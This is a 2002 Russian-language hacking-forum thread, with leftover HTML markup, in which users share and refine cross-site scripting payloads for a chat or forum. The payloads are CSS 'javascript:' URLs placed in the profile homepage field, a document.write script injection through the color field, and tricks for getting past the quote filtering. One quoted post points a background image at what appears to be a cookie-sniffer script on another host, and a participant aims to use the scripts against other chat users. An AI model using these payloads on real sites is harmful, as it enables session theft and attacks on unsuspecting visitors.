|
1) Насчет VB -спасибо. Буду работать... http://forum.antichat.ru/iB_html/non...cons/smile.gif
2) "Но зато точно работает дыра в URL странички", не подскажешь что это такое (или ссылка на статью). Спасибо |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 04 2002,17:11)</td></tr><tr><td id="QUOTE">1) Насчет VB -спасибо. Буду работать... :)
2) "Но зато точно работает дыра в URL странички", не подскажешь что это такое (или ссылка на статью). Спасибо[/QUOTE]<span id='postcolor'> В информации пользователя можно указывать адрес домашней странички. Вместо него пишешь например " style=`background-image:url('javascript:alert()');visibility:hidden` Этот скрипт сработает у всякого, кто посмотрит твою инфу... |
Восторженные аплодисменты, Algolу от меня! Восхищен. И еще раз заверяю всех, что будут наказаны только обидчики. Это мой принцип.
Дима http://forum.antichat.ru/iB_html/non...cons/smile.gif Спасибо |
Намсет JavaScript - самое смешное что у меня работает. И довольно хорошо.
Теперь буду разбираться как можно выкинуть обидчиков из чата... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">" style=`background-image:url('javascript:alert()'http://forum.antichat.ru/iB_html/non...icons/wink.gif;visibility:hidden`[/QUOTE]<span id='postcolor'>
<span id='ME'><center>mifan думает что нада писать в конце не <span style='color:red'>'</span> а <span style='color:red'>"</span></center></span> |
и так подведем итоги:
Если в информации пользователя вместо урл странички указать </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> " style=`background-image:url('javascript:alert()');visibility:hidden" [/QUOTE]<span id='postcolor'> То этот скрипт сработает у всякого кто просмотрит вашу инфу. ======================================= Так что еще, может кто нибуть нашел еще уязвимостиhttp://forum.antichat.ru/iB_html/non...s/confused.gif? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl("//antichat.ru/cgi-bin/sniff.pl")'>"</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>"</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно ` "все прошло"... Егорыч+++ Ага , как бы не так )) .... Algol My Webpage |
Предыдущее общение можно стереть (я дурак)...
Вопросик, хочу написать скарипт посложнее... Вот такой вот работает (через цвет): цвет="background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))"" В чате он превращается в color:;background-image:url(javascript:document.write(unescape(& #39;%3C&#39;)+&#39;script&#39;+unescap e(&#39;%3E&#39;)+&#39;alert()&#39; +&#39;;&#39;+&#39;alert()&#39;+une scape(&#39;%3C&#39;)+&#39;/script&#39;+unescape(&#39;%3E&#39;) )); Но все равно работает. Но вот когда я забиваю внутрь alert что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &#39) и скрипт не испольняется. Как быть не подскажите? |
Уже решил... можете не отвечать: alert(&quot;dd&quot;)
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 05 2002,12:11)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl("//antichat.ru/cgi-bin/sniff.pl")'>"</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>"</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно ` "все прошло"... Егорыч+++ Ага , как бы не так )) .... Algol[/QUOTE]<span id='postcolor'> странно а пачиму у меня не пашет с ', а только с ", может руки кривыеhttp://forum.antichat.ru/iB_html/non...s/confused.gif? |
| Время: 13:17 |